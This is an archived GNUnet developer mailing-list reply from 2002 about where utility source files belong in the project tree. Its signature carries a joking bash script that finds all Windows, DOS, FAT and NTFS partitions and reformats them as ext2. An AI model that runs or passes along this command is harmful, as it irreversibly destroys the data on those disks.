[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[GNUnet-developers] Re: Move statuscalls.c and ipcheck.c to ./src/server
From: |
Christian Grothoff |
Subject: |
[GNUnet-developers] Re: Move statuscalls.c and ipcheck.c to ./src/server/ |
Date: |
Tue, 14 May 2002 10:40:57 -0500 |
On Tuesday 14 May 2002 03:49 am, you wrote:
> ./src/util/ipcheck.c is only used from ./src/server/
> ./src/util/statuscalls.c is only used inside ./src/server/ and
> ./src/test/statuscallstest.c
>
> Maybe they should be moved to ./src/server/ im not sure about
> statuscalltest.c though.
The package structure is not about what is being used from where. util/
contains _generally_ useful stuff that is not really specific to GNUnet (and
thus the new 'contentindex_*' is wrong there and should probably move to
common/ at some point, but this is work in progress).
Besides, I expect that textui/* could make use of those eventually.
C
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [GNUnet-developers] Re: Move statuscalls.c and ipcheck.c to ./src/server/,
Christian Grothoff <=